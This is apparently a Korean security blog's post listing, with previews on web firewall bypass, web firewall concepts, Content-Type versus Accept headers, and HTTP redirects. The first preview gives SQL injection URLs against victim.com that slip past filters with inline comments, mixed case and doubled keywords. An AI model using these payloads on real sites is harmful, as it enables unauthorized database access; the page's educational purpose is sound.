웹 관련 기본 지식5 웹 방화벽 우회기법 1. 기본적인 우회 기법 1) 주석처리 방법 http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3..... http://victim.com/news.php?id=1+/*!union*/ /*!select*/ 1,2,3,4…. 2) 대소문자 교체 방법 * 방화벽 필터설정이 다음과 같을 때 /union\select/g http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3... 3) 단어 대체 방법 일부 방화벽에서는 SQL 키워드를 제거하는 방식을 사용. http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3-- (어떤 WAF는 소문자 "union"과 "se.. 2019. 12. 24. 웹 방화벽의 개념과 원리 웹 방화벽의 개념과 원리 웹 방화벽을 설명하기 앞서 웹 방화벽과 일반 네트워크 방화벽은 둘 다 "방화벽"이라는 단어를 사용한다 하지만 둘의 동작 방법에는 차이가 있다. 먼저 네트워크 방화벽의 동작원리는 네트워크에 돌아다니고 있는 패킷이 정상인지 아닌지를 판단한다. 반면에 웹 방화벽은 패킷이 아닌 사용자의 URL이 정상이고 올바른 요청인지 판단을 하게된다. OSI 7 Layer에 비교를 해보도록 하자. 일반 방화벽은 패킷이 돌아다니게 되는 L3~L4(Network Layer)레벨에 동작한다. 웹 방화벽은 HTTP/HTTPS 요청이 있는 L7(Application Layer)레벨에서 동작한다. 자 그럼 웹 방화벽이란 무엇이며 동작원리와 개념을 알아보자. 레고레고~~~ 웹 방화벽(Web Application .. 2019. 12. 24. Contents-Type Header 와 Accept Header의 차이점 Content-Type: HTTP 메시지(요청과 응답 모두)에 담겨 보내는 데이터의 형식을 알려주는 헤더이다. HTTP 표준 스펙을 따르는 브라우저와 웹서버는 Content-Type 헤더를 기준으로 HTTP 메시지에 담긴 데이터를 분석과 파싱을한다. 만약 Content-Type헤더가 없다면 데이터를 전송하는쪽(브라우저나 웹서버)에서는 특정한 형식의 데이터일지라도 데이터를 받는 입장에서는 단순히 텍스트 데이터로 받아들인다. 중요한점은 HTTP 요청의 경우 GET방식인 경우에는 무조건 URL 끝에 쿼리스트링으로 value=text 형식으로 보내지기 때문에 Content-Type은 필요가 없다. 즉 GET방식으로 데이터를 전송 시 웹서버 입장에서는 value=text 형식 데이터라는 것을 알 수 있기 때문이다.. 2019. 11. 5. 리다이렉트란(Redirect) HTTP 리다이렉트(Redirect)란? 리다이렉트란 말 그대로 re(다시) + 지시하다(direct) 다시 지시하는 것을 말한다. 예를 들어 브라우저가 www.webstone.com/blogA URL을 웹 서버에 요청했다고 하자 그러면 서버는 HTTP 응답 메시지를 통해 "www.webstone.com/blogB 로 다시 요청해봐!~" 라고 브라우저에게 다른 URL(길, 방향) 을 지시할 수 있는 것을 리다이렉트라 한다. ex) (1)www.webstone.com/pageA 요청을 보냄 (1)브라우저 -------> (2)SERVER (2)www.webstone.com/pageB 여기로 가봐 (1)브라우저 (2)SERVER 리다이렉트는 HTTP 표준으로 정의 되어 있는데 최초 요청을 받은 웹서버는 HT.. 2019. 11. 4. 이전 1 2 다음
